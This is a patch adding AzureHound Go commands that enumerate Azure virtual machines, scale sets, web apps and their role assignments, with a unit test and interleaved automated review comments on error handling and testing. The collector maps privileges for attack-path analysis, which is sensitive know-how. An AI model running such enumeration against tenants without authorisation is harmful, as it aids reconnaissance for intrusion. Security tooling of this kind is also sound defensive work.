@@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachinesCmd) +} + +var listVirtualMachinesCmd = &cobra.Command{ + Use: "virtual-machines", + Long: "Lists Azure Virtual Machines", + Run: listVirtualMachinesCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachinesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machines...") + start := time.Now() + stream := listVirtualMachines(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection 
completed", "duration", duration.String()) +} + +func listVirtualMachines(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machines", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureVirtualMachines(ctx, id, query.RMParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing virtual machines for this subscription", "subscriptionId", id) + } else { + virtualMachine := models.VirtualMachine{ + VirtualMachine: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found virtual machine", "virtualMachine", virtualMachine) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZVM, + Data: virtualMachine, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing virtual machines", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all virtual machines") + }() + + return out +} 
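Review bot: In `result.(AzureWrapper).Data.(models.Subscription)` only the second assertion uses the comma-ok form; the first, `result.(AzureWrapper)`, panics if the channel ever carries another type, so the "failed type assertion" log branch is not reached in that case. Check both steps: `wrapper, ok := result.(AzureWrapper)` and then `subscription, ok := wrapper.Data.(models.Subscription)`, logging and returning on either failure. `config.ColStreamCount.Value().(int)` in the `var` block is likewise unchecked, and it runs in the caller rather than in the goroutines that defer `panicrecovery.PanicRecovery()`. list-virtual-machine-role-assignments.go contains the same two expressions.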
diff --git a/cmd/list-virtual-machines_test.go b/cmd/list-virtual-machines_test.go
new file mode 100644
index 0000000..b955d84
--- /dev/null
+++ b/cmd/list-virtual-machines_test.go
@@ -0,0 +1,109 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListVirtualMachines(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockSubscriptionsChannel := make(chan interface{})
+ mockVirtualMachineChannel := make(chan client.AzureResult[azure.VirtualMachine])
+ mockVirtualMachineChannel2 := make(chan client.AzureResult[azure.VirtualMachine])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureVirtualMachines(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineChannel).Times(1)
+ mockClient.EXPECT().ListAzureVirtualMachines(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineChannel2).Times(1)
+ channel := listVirtualMachines(ctx, mockClient, mockSubscriptionsChannel)
+
+ go func() {
+ defer close(mockSubscriptionsChannel)
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ }()
+ go func() {
+ defer close(mockVirtualMachineChannel)
+ mockVirtualMachineChannel <- client.AzureResult[azure.VirtualMachine]{
+ Ok: azure.VirtualMachine{},
+ }
+ mockVirtualMachineChannel <- client.AzureResult[azure.VirtualMachine]{
+ Ok: azure.VirtualMachine{},
+ }
+ }()
+ go func() {
+ defer close(mockVirtualMachineChannel2)
+ mockVirtualMachineChannel2 <- client.AzureResult[azure.VirtualMachine]{
+ Ok: azure.VirtualMachine{},
+ }
+ mockVirtualMachineChannel2 <- client.AzureResult[azure.VirtualMachine]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
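Review bot: The three receive checks in TestListVirtualMachines assert only the dynamic type of each item, so a regression in the fields listVirtualMachines fills in (the `"/subscriptions/" + id` prefix on SubscriptionId, or TenantId) would still pass; both mocked subscriptions also carry an empty SubscriptionId, so the two streams are indistinguishable. Give the mocked subscriptions distinct, non-empty IDs and compare the emitted value, along the lines of `if vm.SubscriptionId != "/subscriptions/"+wantID { t.Errorf("got %q", vm.SubscriptionId) }`. The bare `<-channel` receives have no deadline, so a stalled pipeline hangs the test until the global `go test` timeout; a `select` with `time.After` would fail fast instead. The repeated block could be one loop over the expected count.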
diff --git a/cmd/list-vm-scale-set-role-assignments.go b/cmd/list-vm-scale-set-role-assignments.go
new file mode 100644
index 0000000..343354e
--- /dev/null
+++ b/cmd/list-vm-scale-set-role-assignments.go
@@ -0,0 +1,141 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listVMScaleSetRoleAssignment)
+}
+
+var listVMScaleSetRoleAssignment = &cobra.Command{
+ Use: "vm-scale-set-role-assignments",
+ Long: "Lists Azure VM Scale Set Role Assignments",
+ Run: listVMScaleSetRoleAssignmentImpl,
+ SilenceUsage: true,
+}
+
+func listVMScaleSetRoleAssignmentImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure vm scale set role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listVMScaleSetRoleAssignments(ctx, azClient, listVMScaleSets(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listVMScaleSetRoleAssignments(ctx context.Context, client client.AzureClient, vmScaleSets <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), vmScaleSets) {
+ if vmScaleSet, ok := result.(AzureWrapper).Data.(models.VMScaleSet); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating vm scale set role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, vmScaleSet.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ vmScaleSetRoleAssignments = models.AzureRoleAssignments{
+ ObjectId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this vm scale set", "vmScaleSetId", id)
+ } else {
+ roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId)
+
+ vmScaleSetRoleAssignment := models.AzureRoleAssignment{
+ Assignee: item.Ok,
+ ObjectId: id,
+ RoleDefinitionId: roleDefinitionId,
+ }
+ log.V(2).Info("found vm scale set role assignment", "vmScaleSetRoleAssignment", vmScaleSetRoleAssignment)
+ count++
+ vmScaleSetRoleAssignments.RoleAssignments = append(vmScaleSetRoleAssignments.RoleAssignments, vmScaleSetRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZVMScaleSetRoleAssignment,
+ Data: vmScaleSetRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing vm scale set role assignments", "vmScaleSetId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all vm scale set role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-vm-scale-sets.go b/cmd/list-vm-scale-sets.go
new file mode 100644
index 0000000..e4c42e8
--- /dev/null
+++ b/cmd/list-vm-scale-sets.go
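Review bot: In listVMScaleSetRoleAssignments (cmd/list-vm-scale-set-role-assignments.go) the `item.Error` branch only logs, and the code then still sends `vmScaleSetRoleAssignments` downstream, so a scale set whose listing failed part-way is emitted looking the same as one that genuinely has few or no assignments. For a collector whose output is used to reason about who holds access, that under-reports privileges without any marker in the data. Consider recording the failure and skipping or flagging the send, e.g. `failed = true` in the error branch and `if failed { continue }` before `pipeline.SendAny`; which of the two is right depends on how the ingest side treats a missing object. The log text "unable to continue processing" also does not match what the loop does. listWebAppRoleAssignments in cmd/list-web-app-role-assignments.go has the same pattern.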
@@ -0,0 +1,132 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listVMScaleSetsCmd)
+}
+
+var listVMScaleSetsCmd = &cobra.Command{
+ Use: "vm-scale-sets",
+ Long: "Lists Azure Virtual Machine Scale Sets",
+ Run: listVMScaleSetsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listVMScaleSetsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure virtual machine scale sets...")
+ start := time.Now()
+ stream := listVMScaleSets(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+
+}
+
+func listVMScaleSets(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machine scale sets", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureVMScaleSets(ctx, id) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing virtual machine scale sets for this subscription", "subscriptionId", id)
+ } else {
+ vmScaleSet := models.VMScaleSet{
+ VMScaleSet: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found virtual machine scale set", "vmScaleSet", vmScaleSet)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZVMScaleSet,
+ Data: vmScaleSet,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing virtual machine scale sets", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all virtual machine scale sets")
+ }()
+
+ return out
+}
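Review bot: `result.(AzureWrapper).Data.(models.Subscription)` in listVMScaleSets guards only the second assertion; the first is the single-value form and panics if an upstream stage ever sends something that is not an AzureWrapper, so the "failed type assertion" log path is never reached for that case. The deferred `panicrecovery.PanicRecovery()` presumably catches the panic, but what happens to the run afterwards is not visible in this hunk. Checking both steps, as the test file in this patch already does, keeps the failure on the logged path: `if wrapper, ok := result.(AzureWrapper); !ok { … } else if subscription, ok := wrapper.Data.(models.Subscription); !ok { … }`. The same expression shape appears in listVMScaleSetRoleAssignments, listWebAppRoleAssignments, listWebApps and listVirtualMachines.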
diff --git a/cmd/list-web-app-role-assignments.go b/cmd/list-web-app-role-assignments.go
new file mode 100644
index 0000000..a694928
--- /dev/null
+++ b/cmd/list-web-app-role-assignments.go
@@ -0,0 +1,141 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listWebAppRoleAssignment)
+}
+
+var listWebAppRoleAssignment = &cobra.Command{
+ Use: "web-app-role-assignments",
+ Long: "Lists Azure Web App Role Assignments",
+ Run: listWebAppRoleAssignmentImpl,
+ SilenceUsage: true,
+}
+
+func listWebAppRoleAssignmentImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure web app role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listWebAppRoleAssignments(ctx, azClient, listWebApps(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listWebAppRoleAssignments(ctx context.Context, client client.AzureClient, webApps <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), webApps) {
+ if webApp, ok := result.(AzureWrapper).Data.(models.WebApp); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating web app role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, webApp.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ webAppRoleAssignments = models.AzureRoleAssignments{
+ ObjectId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this web app", "webAppId", id)
+ } else {
+ roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId)
+
+ webAppRoleAssignment := models.AzureRoleAssignment{
+ Assignee: item.Ok,
+ ObjectId: id,
+ RoleDefinitionId: roleDefinitionId,
+ }
+ log.V(2).Info("Found web app role asignment", "webAppRoleAssignment", webAppRoleAssignment)
+ count++
+ webAppRoleAssignments.RoleAssignments = append(webAppRoleAssignments.RoleAssignments, webAppRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZWebAppRoleAssignment,
+ Data: webAppRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing web app role assignments", "webAppId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all web app role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-web-apps.go b/cmd/list-web-apps.go
new file mode 100644
index 0000000..dd8a845
--- /dev/null
+++ b/cmd/list-web-apps.go
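Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in listWebAppRoleAssignmentImpl (cmd/list-web-app-role-assignments.go) registers for os.Kill, which a process cannot catch, so that argument has no effect, while a normal termination request (SIGTERM from `kill` or a service manager) is not handled and ends the process without `gracefulShutdown` running. If a clean stop on termination is intended, `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)` with `syscall` imported expresses that. The same call appears in listVMScaleSetRoleAssignmentImpl, listVMScaleSetsCmdImpl, listWebAppsCmdImpl and start().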
@@ -0,0 +1,134 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listWebAppsCmd)
+}
+
+var listWebAppsCmd = &cobra.Command{
+ Use: "web-apps",
+ Long: "Lists Azure Web Apps",
+ Run: listWebAppsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listWebAppsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure web apps...")
+ start := time.Now()
+ stream := listWebApps(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listWebApps(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating web apps", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureWebApps(ctx, id) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing web apps for this subscription", "subscriptionId", id)
+ } else {
+ webApp := models.WebApp{
+ WebApp: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ ResourceGroupName: item.Ok.ResourceGroupName(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ if webApp.Kind == "app" {
+ log.V(2).Info("found web app", "webApp", webApp)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZWebApp,
+ Data: webApp,
+ }); !ok {
+ return
+ }
+ }
+ }
+ }
+ log.V(1).Info("finished listing web apps", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all web apps")
+ }()
+
+ return out
+}
diff --git a/cmd/root.go b/cmd/root.go
new file mode 100644
index 0000000..aa99259
--- /dev/null
+++ b/cmd/root.go
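Review bot: `if webApp.Kind == "app"` in listWebApps (cmd/list-web-apps.go) is an exact match, and every item with another kind is dropped with no log line and no counter. Azure reports compound kind strings for App Service sites (for example `app,linux`), so if those are meant to be collected this filter leaves them out of the results without any trace; confirm against the API responses actually returned. If they are in scope, compare on the first comma-separated token, e.g. `kind, _, _ := strings.Cut(webApp.Kind, ",")` followed by `if kind == "app" {` (needs `strings` imported). Either way, a `log.V(2).Info("skipping site", "kind", webApp.Kind)` in the else path would make coverage gaps visible.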
@@ -0,0 +1,47 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "github.com/go-logr/logr"
+ "github.com/spf13/cobra"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+)
+
+var (
+ rootCmd = &cobra.Command{
+ Use: constants.Name,
+ Long: constants.Description,
+ Version: constants.Version,
+ }
+ log logr.Logger
+)
+
+func init() {
+ config.Init(rootCmd, config.GlobalConfig)
+}
+
+func Execute() error {
+ return rootCmd.Execute()
+}
+
+func StartService() error {
+ return startCmd.Execute()
+}
diff --git a/cmd/start.go b/cmd/start.go
new file mode 100644
index 0000000..01e450b
--- /dev/null
+++ b/cmd/start.go
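Review bot: `StartService` in cmd/root.go calls `startCmd.Execute()`, but cobra dispatches Execute through the root command whichever command it is called on, so this appears to behave the same as `Execute()` and reaches the start subcommand only when the process arguments name it. If service mode relies on that, say so in a doc comment, e.g. `// StartService runs the command tree for service mode; cobra dispatches from the root, so "start" must be present in the arguments.`; if the intent is to force the subcommand, the arguments would have to be set explicitly before executing. `Execute` is also exported without a doc comment, and `log` is declared here as a zero-value `logr.Logger` whose initialisation is not in this file, which is worth a one-line comment pointing at where it is set.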
